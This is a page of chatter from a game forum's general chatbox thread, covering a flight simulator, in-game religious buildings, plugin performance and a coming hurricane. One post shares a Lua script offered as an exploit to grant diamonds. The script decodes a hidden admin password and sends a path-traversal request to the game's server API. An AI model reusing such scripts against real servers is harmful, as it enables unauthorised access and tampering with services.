TheoTown Forum Chatbox

Here you can talk about everything you want.
User avatar
RayXP
Inhabitant of a Infinity
Reactions:
Posts: 8125
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9701

Post by RayXP »

Maybe

User avatar
TheFennekin
Neighborhood fox
Reactions:
Posts: 2728
Joined: 24 Aug 2017, 11:17
Location: Wandering around
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9702

Post by TheFennekin »

I wish it's possible to add your own influence in your plugins 😕

User avatar
Uncle Koala
Metropolitan
Reactions:
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9703

Post by Uncle Koala »

Anyone here seen the new Microsoft Flight Simulator? It looks amazing. I saw a video of someone intentionally slowing their internet down to see how 2D Satelitte images turn into full 3D cities. Truly next gen.

User avatar
CommanderABab
AB
Reactions:
Posts: 11135
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9704

Post by CommanderABab »

I watched a video of someone doing the challenge of landing a plane on a runway half the length recommended for the plane.

User avatar
Kamikazi
Inhabitant of a Conurbation
Reactions:
Posts: 471
Joined: 27 Jan 2018, 00:58
Location: ESPAÑA
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9705

Post by Kamikazi »

MFS 2020 is just straight up astonishing. I saw 2 joke-ish videos about it and 2 videos of raw gameplay footage. It really looks realistic. I'm also impressed with the default planes

User avatar
Uncle Koala
Metropolitan
Reactions:
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9706

Post by Uncle Koala »

Lobby in 2018 wrote: Yeah, it's a cool building. I'm afraid there could be complains if I re-add it into the game natively, as it would mean that we have more buildings of a specific religion. I often get requests to add buildings of various religions...
Today:
Screenshot_20200820_193828_info.flowersoft.theotown.theotown-picsay.jpg
🤔

User avatar
malsa
Inhabitant of a Multiverse
Reactions:
Posts: 5085
Joined: 10 Feb 2017, 17:40
Location: Malaysia
Plugins: Showcase Store
Version: Beta

Platform

Re: TheoTown Forum Chatbox

#9707

Post by malsa »

Do we have synagogue and temple in theotown?

User avatar
CommanderABab
AB
Reactions:
Posts: 11135
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9708

Post by CommanderABab »


User avatar
CommanderABab
AB
Reactions:
Posts: 11135
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9709

Post by CommanderABab »

Apparently not.

User avatar
Uncle Koala
Metropolitan
Reactions:
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9710

Post by Uncle Koala »

To people who read crash reports: Sorry for those stack overflows, won't happen again! :bf

Anyways, I made AMAZING progress on my Terrain Tools plugin.

Replacing all ground with sand on a giant map took almost 2 hours. Now? It's 5 seconds. 5 SECONDS! And it affects no other scripts at all! Nothing runs until you make it run! This means I can add all kinds of scripts now and the impact will be minimal.
Tekib_20-08-22_19.58.07.png
Sorry for the night mode. If you zoom in, you will see that it's not snow, it's sand!

User avatar
RayXP
Inhabitant of a Infinity
Reactions:
Posts: 8125
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9711

Post by RayXP »

Anyone know how to fix this? My xbox disconnects from my wifi like every 5 minutes, and it's really annoying...

User avatar
JustAnyone
Developer
Reactions:
Posts: 3491
Joined: 23 Jul 2017, 12:45
Location: Easter Island
Plugins: Showcase Store

Platform

Re: TheoTown Forum Chatbox

#9712

Post by JustAnyone »

Found a cheesy exploit which you can use to generate diamonds. Either that or it's somehow broken, idk.
Unfortunately, it's limited for 1 diamond per http request

Code: Select all    Reset

local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' function dec(data) data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end local LuaSocket = require("socket") client = LuaSocket.connect("ja.theotown.com", 80) client:send("GET ../../api/public/diamond_req.php?login=admin&pass="..dec('NDJkU2FYcGVyaWE=').."&action=add_diamond&param1=1&user=<your_forum_user_id> HTTP/1.0\r\nHost: ja.theotown.com\r\n\r\n") while true do s, status, partial = client:receive('*a') print(s or partial) if status == "closed" then break end end client:close()
Interactive Lua editor
Run

User avatar
CommanderABab
AB
Reactions:
Posts: 11135
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9713

Post by CommanderABab »


Turn your volume up

@JustAnyone

User avatar
Uncle Koala
Metropolitan
Reactions:
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9714

Post by Uncle Koala »

JustAnyone can show diamond exploits but if I did something like that, I would be banned. :fire

User avatar
Kamikazi
Inhabitant of a Conurbation
Reactions:
Posts: 471
Joined: 27 Jan 2018, 00:58
Location: ESPAÑA
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9715

Post by Kamikazi »

Huh, nice exploit

User avatar
JustAnyone
Developer
Reactions:
Posts: 3491
Joined: 23 Jul 2017, 12:45
Location: Easter Island
Plugins: Showcase Store

Platform

Re: TheoTown Forum Chatbox

#9716

Post by JustAnyone »

Uncle Koala wrote:
25 Aug 2020, 08:56
JustAnyone can show diamond exploits but if I did something like that, I would be banned. :fire
pls share with me

User avatar
Uncle Koala
Metropolitan
Reactions:
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9717

Post by Uncle Koala »

JustAnyone wrote:
25 Aug 2020, 12:16
Uncle Koala wrote:
25 Aug 2020, 08:56
JustAnyone can show diamond exploits but if I did something like that, I would be banned. :fire
pls share with me
Hmm... I'll think about it. Meanwhile, you can think about this :space
Uncle Koala wrote:
24 Aug 2020, 20:11
<..>

Suggestion to devs: please add something like Tile.setUntouchable(x, y) :ugeek:

User avatar
RayXP
Inhabitant of a Infinity
Reactions:
Posts: 8125
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9718

Post by RayXP »

There's a big epic hurricane coming my way 😳

User avatar
Imran M
Inhabitant of a Country
Reactions:
Posts: 844
Joined: 24 Oct 2018, 13:41
Plugins: Showcase Store

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9719

Post by Imran M »

RayXP wrote:
25 Aug 2020, 14:28
There's a big epic hurricane coming my way 😳
Well, that's not good.

User avatar
RayXP
Inhabitant of a Infinity
Reactions:
Posts: 8125
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9720

Post by RayXP »

Imran M wrote:
25 Aug 2020, 16:58
RayXP wrote:
25 Aug 2020, 14:28
There's a big epic hurricane coming my way 😳
Well, that's not good.
Well I'm not rlly that worried, since my house has survived multiple hurricanes, and my neighborhood rarely floods (didn't flood during Harvey)...

Post Reply Previous topicNext topic

Return to “Smalltalk”